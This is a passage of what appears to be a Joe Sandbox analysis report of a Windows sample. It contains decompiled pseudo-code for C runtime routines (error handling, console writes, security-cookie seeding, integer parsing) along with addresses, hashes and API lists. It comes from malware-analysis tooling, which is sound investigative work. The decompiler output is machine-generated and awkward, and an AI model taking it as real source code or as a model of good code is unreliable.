0x01385edf
0x01385ee5
0x01385ee9
0x01385ef6
0x00000000
0x01385eeb
0x01385eee
0x01385f68
0x01385f68
0x01385ef0
0x01385ef0
0x01385ef0
0x01385ef2
0x01385ef2
0x01385ef2
0x01385eee
0x01385ee9
0x01385f6b
0x01385f73
0x01385f7c

APIs

GetLastError.KERNEL32(?,?,?,0137FD29,0138875D,?,?,01378B75,?,?,?,?,?,01371221,?,?), ref: 01385ECD
_free.LIBCMT ref: 01385F2A
_free.LIBCMT ref: 01385F60
SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,01378B75,?,?,?,?,?,01371221,?,?), ref: 01385F6B

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 0f9ce51a0e43a21470e57971f17d9844a2fc8c3db68c7932be838b62a5b82a26
Instruction ID: 78def08f8a8df181906572918e03cdfa88bdaff409d69a4c5576db7160fa34e5
Opcode Fuzzy Hash: 0f9ce51a0e43a21470e57971f17d9844a2fc8c3db68c7932be838b62a5b82a26
Instruction Fuzzy Hash: 3611C832605702AFFA217B7DAD84D6B366EBBE07BDFA44268F519D71C0DF619C058220

Uniqueness

Uniqueness Score: -1.00%

Function 013750B0 Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E013750B0(signed int __edx, void* __eflags, intOrPtr _a4, char _a16) {
				signed int _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v52;
				signed int _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v85;
				intOrPtr _v88;
				char _v93;
				signed int _v96;
				char _v100;
				char _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t102;
				signed int _t113;
				signed int _t117;
				signed int _t126;
				void* _t128;
				signed int _t129;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t136;
				intOrPtr _t139;
				intOrPtr _t143;
				void* _t145;
				signed int _t147;
				intOrPtr _t158;
				signed short* _t159;
				signed int _t168;
				signed int _t174;
				void* _t178;
				void* _t184;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t210;

				_t196 = __edx;
				_t102 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t102 ^ _t206;
				_t158 = _a4;
				E01375D4D( &_v12, 0);
				_t201 =  *0x14a6140;
				_v16 = _t201;
				_t203 = E0137181F(_t158, E0137178E(_t158, 0x14a614c, __edx, _t201));
				if(_t203 != 0) {
					L5:
					E01375DA5( &_v12);
					return E01377F14(_t203, _t158, _v8 ^ _t206, _t196, _t201, _t203);
				} else {
					if(_t201 == 0) {
						__eflags = E013755F9(__edx,  &_v16, _t158) - 0xffffffff;
						if(__eflags == 0) {
							E01371664();
							asm("int3");
							_push(_t206);
							_t210 = (_t208 & 0xfffffff8) - 0x44;
							_t113 =  *0x13a3014; // 0x98b2b77b
							_v36 = _t113 ^ _t210;
							_push(_t158);
							_t159 = _v12;
							_push(_t203);
							_v84 = _v24;
							_t204 = 0;
							_t168 =  *_t159 & 0x0000ffff;
							_v72 = _v20;
							_t117 = _t168;
							_push(_t201);
							_t202 = _v16;
							__eflags = _t168;
							if(_t168 != 0) {
								_t200 = _t117;
								do {
									__eflags = _t200 - _t168;
									_t154 =  !=  ? _t202 : _t202 + 1;
									_t204 = _t204 + 1;
									_t202 =  !=  ? _t202 : _t202 + 1;
									_t200 = _t159[_t204] & 0x0000ffff;
									__eflags = _t200;
								} while (_t200 != 0);
							}
							_v60 = _v60 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = 0xf;
							E013721B3( &_v60, _t202, 0);
							_v72 = E01376046(_t159, _t202, _t204, __eflags);
							_v84 = E01374E63(_t159, _t196, _t202, __eflags,  &_v76, 1);
							E013717EE( &_v76);
							_v88 = 0xfffffffe;
							_v101 = 0;
							_t205 = 0;
							_t174 = 0;
							_v100 = 1;
							_v96 = 0;
							__eflags = _t202;
							if(_t202 != 0) {
								while(1) {
									_t126 = _t159[_t205] & 0x0000ffff;
									_t196 = _t126;
									__eflags = _t126;
									if(_t126 != 0) {
									}
									L12:
									_t196 =  *_t159 & 0x0000ffff;
									while(1) {
										__eflags = _t126 - _t196;
										if(_t126 == _t196) {
											goto L15;
										}
										_t205 = _t205 + 1;
										_t126 = _t159[_t205] & 0x0000ffff;
										__eflags = _t126;
										if(_t126 != 0) {
											continue;
										}
										goto L15;
									}
									L15:
									__eflags = _v32 - 0x10;
									_t128 =  >=  ? _v52 :  &_v52;
									__eflags =  *((char*)(_t128 + _t174));
									if( *((char*)(_t128 + _t174)) == 0) {
										_t205 = _t205 + _v84;
										_t129 = _t159[_t205] & 0x0000ffff;
										__eflags = _t129 -  *_t159;
										if(_t129 ==  *_t159) {
											L30:
											__eflags = _v32 - 0x10;
											_t196 =  >=  ? _v52 :  &_v52;
											_t178 = 0x7f;
											__eflags = _v84 - _t178;
											_t179 =  <  ? _v84 & 0x000000ff : _t178;
											_t132 = _v80;
											 *((char*)(( >=  ? _v52 :  &_v52) + _t132)) =  <  ? _v84 & 0x000000ff : _t178;
											_t174 = _t132;
											_v72 = _t174;
											goto L31;
										} else {
											__eflags = _t129;
											if(_t129 == 0) {
												goto L30;
											} else {
												_t136 = E01375658(_v76, _v64);
												__eflags = _t136;
												if(_t136 != 0) {
													L29:
													__eflags = _v32 - 0x10;
													_t196 =  >=  ? _v52 :  &_v52;
													_t184 = 0x7f;
													__eflags = _v84 - _t184;
													_t185 =  <  ? _v84 & 0x000000ff : _t184;
													_t139 = _v80;
													 *((char*)(( >=  ? _v52 :  &_v52) + _t139)) =  <  ? _v84 & 0x000000ff : _t184;
													_t174 = _t139;
													goto L31;
												} else {
													__eflags = _a16 - 1;
													if(_a16 != 1) {
														_v64 =  *((intOrPtr*)( *_v68 + 0x20))(_t159[_t205] & 0x0000ffff) & 0x0000ffff;
														_t143 = _v80;
														__eflags =  *((char*)(_t143 + 4));
														if( *((char*)(_t143 + 4)) == 0) {
															E01374D2D(_t143);
															_t143 = _v80;
														}
														_t196 = _v72;
														_t145 =  *((intOrPtr*)( *_v72 + 0x20))( *(_t143 + 6) & 0x0000ffff);
														_t190 = 0;
														__eflags = _v68 - _t145;
													} else {
														_t147 = _v76;
														__eflags =  *((char*)(_t147 + 4));
														if( *((char*)(_t147 + 4)) == 0) {
															E01374D2D(_t147);
														}
														_t196 = _v76;
														_t190 = 0;
														__eflags = _t159[_t205] -  *((intOrPtr*)(_v76 + 6));
													}
													if(__eflags != 0) {
														goto L29;
													} else {
														_t174 = _v88;
														_t133 = 1;
														_v93 = 1;
													}
												}
											}
										}
									} else {
										__eflags = _v32 - 0x10;
										_t151 =  >=  ? _v52 :  &_v52;
										_t205 = _t205 +  *((char*)(( >=  ? _v52 :  &_v52) + _t174));
										L31:
										_t133 = _v85;
									}
									L32:
									_t174 = _t174 + 1;
									_v80 = _t174;
									__eflags = _t174 - _t202;
									if(_t174 < _t202) {
										do {
											_t126 = _t159[_t205] & 0x0000ffff;
											_t196 = _t126;
											__eflags = _t126;
											if(_t126 != 0) {
											}
											goto L15;
										} while (_t174 < _t202);
									}
									__eflags = _t133;
									if(_t133 != 0) {
										_t205 = _v76;
										_t134 = E01375658(_v76, _v64);
										__eflags = _t134;
										if(_t134 == 0) {
											_v84 = _v84 + 1;
											E01374D5B(_t205);
											_v72 = _v72 | 0xffffffff;
											_v85 = 0;
											_t205 = 0;
											_t174 = 0;
											_v80 = 0;
											continue;
										}
									}
									goto L36;
								}
							}
							L36:
							E0137218D( &_v52);
							__eflags = _v28 ^ _t210;
							return E01377F14(_v72, _t159, _v28 ^ _t210, _t196, _t202, _t205);
						} else {
							_t203 = _v16;
							E01376014(__eflags, _t203);
							 *((intOrPtr*)( *_t203 + 4))();
							 *0x14a6140 = _t203;
							goto L5;
						}
					} else {
						_t203 = _t201;
						goto L5;
					}
				}
			}

0x013750b0
0x013750b6
0x013750bd
0x013750c1
0x013750cb
0x013750d0
0x013750db
0x013750eb
0x013750ef
0x01375121
0x01375124
0x01375139
0x013750f1
0x013750f3
0x01375105
0x01375108
0x0137513a
0x0137513f
0x01375140
0x01375146
0x01375149
0x01375150
0x01375157
0x01375158
0x0137515b
0x0137515c
0x01375160
0x01375165
0x01375168
0x0137516c
0x0137516e
0x0137516f
0x01375172
0x01375175
0x01375177
0x01375179
0x01375179
0x0137517f
0x01375182
0x01375183
0x01375185
0x01375189
0x01375189
0x01375179
0x0137518e
0x01375197
0x0137519f
0x013751a7
0x013751b3
0x013751c7
0x013751cb
0x013751d2
0x013751da
0x013751de
0x013751e0
0x013751e2
0x013751ea
0x013751ee
0x013751f0
0x013751f6
0x013751f6
0x013751fa
0x013751fc
0x013751ff
0x013751ff
0x01375201
0x01375201
0x01375204
0x01375204
0x01375207
0x00000000
0x00000000
0x01375209
0x0137520a
0x0137520e
0x01375211
0x00000000
0x00000000
0x00000000
0x01375211
0x01375213
0x01375213
0x0137521c
0x01375221
0x01375225
0x01375240
0x01375244
0x01375248
0x0137524b
0x01375312
0x01375312
0x0137531f
0x01375326
0x01375327
0x0137532e
0x01375331
0x01375335
0x01375338
0x0137533a
0x00000000
0x01375251
0x01375251
0x01375254
0x00000000
0x0137525a
0x01375262
0x01375267
0x01375269
0x013752e8
0x013752e8
0x013752f5
0x013752fc
0x013752fd
0x01375304
0x01375307
0x0137530b
0x0137530e
0x00000000
0x0137526b
0x0137526b
0x0137526f
0x013752a5
0x013752a9
0x013752ad
0x013752b1
0x013752b5
0x013752ba
0x013752ba
0x013752be
0x013752cb
0x013752ce
0x013752d0
0x01375271
0x01375271
0x01375275
0x01375279
0x0137527d
0x0137527d
0x01375282
0x01375286
0x0137528c
0x0137528c
0x013752da
0x00000000
0x013752dc
0x013752dc
0x013752e0
0x013752e2
0x013752e2
0x013752da
0x01375269
0x01375254
0x01375227
0x01375227
0x01375230
0x01375239
0x0137533e
0x0137533e
0x0137533e
0x01375342
0x01375342
0x01375343
0x01375347
0x01375349
0x013751f6
0x013751f6
0x013751fa
0x013751fc
0x013751ff
0x013751ff
0x00000000
0x013751ff
0x013751f6
0x0137534f
0x01375351
0x01375357
0x0137535d
0x01375362
0x01375364
0x01375366
0x0137536c
0x01375371
0x01375378
0x0137537c
0x0137537e
0x01375380
0x00000000
0x01375380
0x01375364
0x00000000
0x01375351
0x013751f6
0x01375389
0x0137538d
0x0137539d
0x013753a7
0x0137510a
0x0137510a
0x0137510e
0x01375118
0x0137511b
0x00000000
0x0137511b
0x013750f5
0x013750f5
0x00000000
0x013750f5
0x013750f3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013750CB

Part of subcall function 0137178E: std::_Lockit::_Lockit.LIBCPMT ref: 013717AA
Part of subcall function 0137178E: std::_Lockit::~_Lockit.LIBCPMT ref: 013717C6

std::_Facet_Register.LIBCPMT ref: 0137510E
std::_Lockit::~_Lockit.LIBCPMT ref: 01375124
Concurrency::cancel_current_task.LIBCPMT ref: 0137513A

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 37946a0b87c47da561485c0e2ddb55724ff156ae8e8c1b32c279858c99530c3b
Instruction ID: 98d785c599025b97d980620d286f93c8ab87bb6a93208ebfc9767fb63949d3c7
Opcode Fuzzy Hash: 37946a0b87c47da561485c0e2ddb55724ff156ae8e8c1b32c279858c99530c3b
Instruction Fuzzy Hash: 8C012D72B00119EBCB39FF6CD8549ADBBB8EF54228F110159D912D7280DF38AD058790

Uniqueness

Uniqueness Score: -1.00%

Function 01392668 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01392668(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x13a3a70, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E01392651();
					E01392613();
					_t13 = WriteConsoleW( *0x13a3a70, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x01392685
0x01392689
0x01392696
0x0139269b
0x013926b6
0x013926b6
0x013926bc

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,013916D2,00000000,00000001,00000000,00000000,?,0138A236,?,00000000,00000000), ref: 0139267F
GetLastError.KERNEL32(?,013916D2,00000000,00000001,00000000,00000000,?,0138A236,?,00000000,00000000,?,00000000,?,0138A782,?), ref: 0139268B

Part of subcall function 01392651: CloseHandle.KERNEL32(FFFFFFFE,0139269B,?,013916D2,00000000,00000001,00000000,00000000,?,0138A236,?,00000000,00000000,?,00000000), ref: 01392661

___initconout.LIBCMT ref: 0139269B

Part of subcall function 01392613: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01392642,013916BF,00000000,?,0138A236,?,00000000,00000000,?), ref: 01392626

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,013916D2,00000000,00000001,00000000,00000000,?,0138A236,?,00000000,00000000,?), ref: 013926B0

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 752e39ece827cc3abae8b1d9ac67336b18a763afb98478e8eb5606d020d970e4
Instruction ID: 03fb690a25aba5933d6c74d81addff25905bf4e3fd813103f9514fadfd82b010
Opcode Fuzzy Hash: 752e39ece827cc3abae8b1d9ac67336b18a763afb98478e8eb5606d020d970e4
Instruction Fuzzy Hash: 8CF03036500525BBCF322FE9EC04A8A7F6AFB493B5F004011FE09C6521D6728821DFD0

Uniqueness

Uniqueness Score: -1.00%

Function 013783BC Relevance: 6.0, APIs: 4, Instructions: 25
timethreadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013783BC() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				GetSystemTimeAsFileTime( &_v16);
				_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
				_v8 = _v8 ^ GetCurrentThreadId();
				_v8 = _v8 ^ GetCurrentProcessId();
				QueryPerformanceCounter( &_v24);
				return _v20 ^ _v24.LowPart ^ _v8 ^  &_v8;
			}

0x013783c2
0x013783c9
0x013783ce
0x013783da
0x013783e3
0x013783ec
0x013783f3
0x01378408

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 013783CE
GetCurrentThreadId.KERNEL32 ref: 013783DD
GetCurrentProcessId.KERNEL32 ref: 013783E6
QueryPerformanceCounter.KERNEL32(?), ref: 013783F3

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 66a03a91721eb430fc59a936e9e3c04b9b2aed20072560ccf8921f96562aac96
Instruction ID: 118755ace06e12655f9d222e56c93542d1fdc8dcf675d2a8ea62677779cdd5af
Opcode Fuzzy Hash: 66a03a91721eb430fc59a936e9e3c04b9b2aed20072560ccf8921f96562aac96
Instruction Fuzzy Hash: 39F05A71C11209EBCF10DBF4D689A9EFBF8FF18345FA188969412E7244E734AB059B51

Uniqueness

Uniqueness Score: -1.00%

Function 0137FF50 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

pow, xrefs: 01382375, 01382392

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: b12d2f43bf8b510f9417a47b8874292c3a7ddf0eb6f4396b6315e91ebe1e81ae
Instruction ID: 017ac11f55f337952469c375e0ac67555898bf6e4d42c950726c40ca650d924f
Opcode Fuzzy Hash: b12d2f43bf8b510f9417a47b8874292c3a7ddf0eb6f4396b6315e91ebe1e81ae
Instruction Fuzzy Hash: 4F518E71A0830786DB33BB1CC95137FBFA4DB40709F248999E4D54229DEB798495CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0137768B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0137768B(void* __ecx, signed char* _a4, signed char* _a8, signed int _a12, signed int* _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char* _v32;
				void* __ebx;
				signed int* _t39;
				signed int _t40;
				void* _t41;
				char _t42;
				signed char* _t43;
				signed int _t44;
				signed char _t45;
				signed char _t46;
				signed char _t47;
				void* _t52;
				signed char* _t56;
				signed char _t61;
				signed char* _t63;
				signed int _t65;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed char* _t74;
				signed char** _t75;
				void* _t77;
				signed char* _t78;
				signed int _t79;
				signed int _t83;
				signed int _t85;
				signed char* _t87;
				void* _t89;
				void* _t90;

				_t66 = __ecx;
				_t39 = _a16;
				_t90 = _t89 - 0x1c;
				if(_t39 != 0) {
					 *_t39 =  *_t39 & 0x00000000;
				}
				_t63 = _a4;
				_t87 = _t63;
				_t40 =  *_t63 & 0x000000ff;
				L4:
				_t41 = E013801A0(_t63, _t66, _t79, _t40);
				_pop(_t66);
				if(_t41 != 0) {
					_t87 =  &(_t87[1]);
					__eflags = _t87;
					_t40 =  *_t87 & 0x000000ff;
					goto L4;
				}
				_t42 =  *_t87;
				_v6 = _t42;
				if(_t42 == 0x2d || _t42 == 0x2b) {
					_t87 =  &(_t87[1]);
					__eflags = _t87;
				} else {
					_v6 = 0x2b;
				}
				_t83 = _a12;
				if(_t83 < 0 || _t83 == 1 || _t83 > 0x24) {
					_t43 = _a8;
					__eflags = _t43;
					if(_t43 != 0) {
						 *_t43 = _t63;
					}
					goto L52;
				} else {
					if(_t83 <= 0) {
						_t45 =  *_t87;
						__eflags = _t45 - 0x30;
						if(_t45 == 0x30) {
							_t46 = _t87[1];
							__eflags = _t46 - 0x78;
							if(_t46 == 0x78) {
								L26:
								_t83 = 0x10;
								L27:
								_t87 =  &(_t87[2]);
								L28:
								_v20 = _t83;
								_v16 = _t87;
								L24:
								_t45 =  *_t87;
								if(_t45 == 0x30) {
									L23:
									_t87 =  &(_t87[1]);
									__eflags = _t87;
									goto L24;
								}
								L25:
								_t67 = 0;
								_v32 = _t87;
								_t65 = 0;
								_v24 = 0;
								_v28 = 0;
								_v5 = 0;
								_t47 = _t45;
								while(1) {
									_v12 = _t67;
									_t69 = E013792E0("0123456789abcdefghijklmnopqrstuvwxyz", E01380328(_t47), _t83);
									_t90 = _t90 + 0xc;
									if(_t69 == 0) {
										break;
									}
									_t51 = _v12;
									_t79 = "0123456789abcdefghijklmnopqrstuvwxyz";
									_v24 = _v12;
									_v28 = _t65;
									_v5 = _t69 - _t79;
									_t52 = E013782E0(_t83, 0, _t51, _t65);
									_t65 = _t79;
									asm("cdq");
									_t67 = _t52 + _v5;
									asm("adc ebx, edx");
									_t87 =  &(_t87[1]);
									__eflags = _t87;
									_t47 =  *_t87;
								}
								if(_v16 != _t87) {
									_t27 = _t83 + 0x1394f3c; // 0x10101011
									_t74 = _t87 -  *_t27 - _v32;
									__eflags = _t74;
									if(_t74 < 0) {
										_t85 = _v12;
										L45:
										__eflags = _v6 - 0x2d;
										if(_v6 == 0x2d) {
											_t85 =  ~_t85;
											asm("adc ebx, 0x0");
											_t65 =  ~_t65;
										}
										L47:
										_t75 = _a8;
										__eflags = _t75;
										if(_t75 != 0) {
											 *_t75 = _t87;
										}
										_t44 = _t85;
										L53:
										return _t44;
									}
									__eflags = _t74;
									if(__eflags > 0) {
										L41:
										 *((intOrPtr*)(E0137FD24(__eflags))) = 0x22;
										_t56 = _a16;
										__eflags = _t56;
										if(_t56 != 0) {
											 *_t56 = 1;
										}
										_t85 = _t83 | 0xffffffff;
										_t65 = _t85;
										goto L47;
									}
									_t83 = _v12;
									asm("cdq");
									_t77 = _t83 - _v5;
									_t58 = _t65;
									asm("sbb eax, edx");
									__eflags = _t65 - _t65;
									if(__eflags < 0) {
										goto L41;
									}
									if(__eflags > 0) {
										L39:
										__eflags = E01378320(_t77, _t58, _v20, 0) - _v24;
										if(__eflags != 0) {
											goto L41;
										}
										__eflags = _t79 - _v28;
										if(__eflags == 0) {
											goto L45;
										}
										goto L41;
									}
									__eflags = _t83 - _t77;
									if(__eflags < 0) {
										goto L41;
									}
									goto L39;
								}
								_t78 = _a8;
								if(_t78 != 0) {
									 *_t78 = _a4;
								}
								L52:
								_t44 = 0;
								goto L53;
							}
							__eflags = _t46 - 0x58;
							if(_t46 == 0x58) {
								goto L26;
							}
							_t83 = 8;
							_v20 = _t83;
							_v16 = _t87;
							goto L23;
						}
						_t83 = 0xa;
						_v20 = _t83;
						_v16 = _t87;
						goto L25;
					}
					if(_t83 != 0x10 ||  *_t87 != 0x30) {
						goto L28;
					} else {
						_t61 = _t87[1];
						if(_t61 == 0x78) {
							goto L27;
						}
						if(_t61 != 0x58) {
							goto L28;
						}
						goto L27;
					}
				}
			}

0x0137768b
0x0137768e
0x01377691
0x01377696
0x01377698
0x01377698
0x0137769c
0x013776a1
0x013776a3
0x013776ac
0x013776ad
0x013776b2
0x013776b5
0x013776a8
0x013776a8
0x013776a9
0x00000000
0x013776a9
0x013776b7
0x013776b9
0x013776be
0x013776ca
0x013776ca
0x013776c4
0x013776c4
0x013776c4
0x013776cb
0x013776d0
0x0137783c
0x0137783f
0x01377841
0x01377843
0x01377843
0x00000000
0x013776e8
0x013776ea
0x01377703
0x01377705
0x01377707
0x01377714
0x01377717
0x01377719
0x01377744
0x01377746
0x01377747
0x01377747
0x0137774a
0x0137774a
0x0137774d
0x01377729
0x01377729
0x0137772d
0x01377728
0x01377728
0x01377728
0x00000000
0x01377728
0x0137772f
0x0137772f
0x01377731
0x01377734
0x01377736
0x01377739
0x0137773c
0x0137773f
0x01377780
0x01377782
0x01377797
0x01377799
0x0137779e
0x00000000
0x00000000
0x01377752
0x01377755
0x01377760
0x01377764
0x01377767
0x0137776a
0x01377771
0x01377777
0x01377778
0x0137777a
0x0137777c
0x0137777c
0x0137777d
0x0137777d
0x013777a3
0x013777ba
0x013777c5
0x013777c5
0x013777c8
0x0137781d
0x01377820
0x01377820
0x01377824
0x01377826
0x01377828
0x0137782b
0x0137782b
0x0137782d
0x0137782d
0x01377830
0x01377832
0x01377834
0x01377834
0x01377836
0x01377849
0x0137784d
0x0137784d
0x013777ca
0x013777cc
0x013777fe
0x01377803
0x01377809
0x0137780c
0x0137780e
0x01377810
0x01377810
0x01377816
0x01377819
0x00000000
0x01377819
0x013777d2
0x013777d7
0x013777d8
0x013777da
0x013777dc
0x013777de
0x013777e0
0x00000000
0x00000000
0x013777e2
0x013777e8
0x013777f4
0x013777f7
0x00000000
0x00000000
0x013777f9
0x013777fc
0x00000000
0x00000000
0x00000000
0x013777fc
0x013777e4
0x013777e6
0x00000000
0x00000000
0x00000000
0x013777e6
0x013777a5
0x013777aa
0x013777b3
0x013777b3
0x01377845
0x01377845
0x00000000
0x01377847
0x0137771b
0x0137771d
0x00000000
0x00000000
0x01377721
0x01377722
0x01377725
0x00000000
0x01377725
0x0137770b
0x0137770c
0x0137770f
0x00000000
0x0137770f
0x013776ef
0x00000000
0x013776f6
0x013776f6
0x013776fb
0x00000000
0x00000000
0x013776ff
0x00000000
0x00000000
0x00000000
0x01377701
0x013776ef

APIs

__aulldiv.LIBCMT ref: 013777EF

Strings

-, xrefs: 01377820
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 01377755, 0137778C, 01377791

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: d89b61275bf12feb076fbb4c65fba2c65b58db5d640c855c2ec6704fb5dd1bdc
Instruction ID: dbf182daab5d663b31e089714e137133baf6df33a3c3fb9c3c06190b3f867134
Opcode Fuzzy Hash: d89b61275bf12feb076fbb4c65fba2c65b58db5d640c855c2ec6704fb5dd1bdc
Instruction Fuzzy Hash: D1510570B04289ABDF358F6DC8997BEFFFAAF45218F14405AE591D7241C2B88542CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01382A85 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E01382A85(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
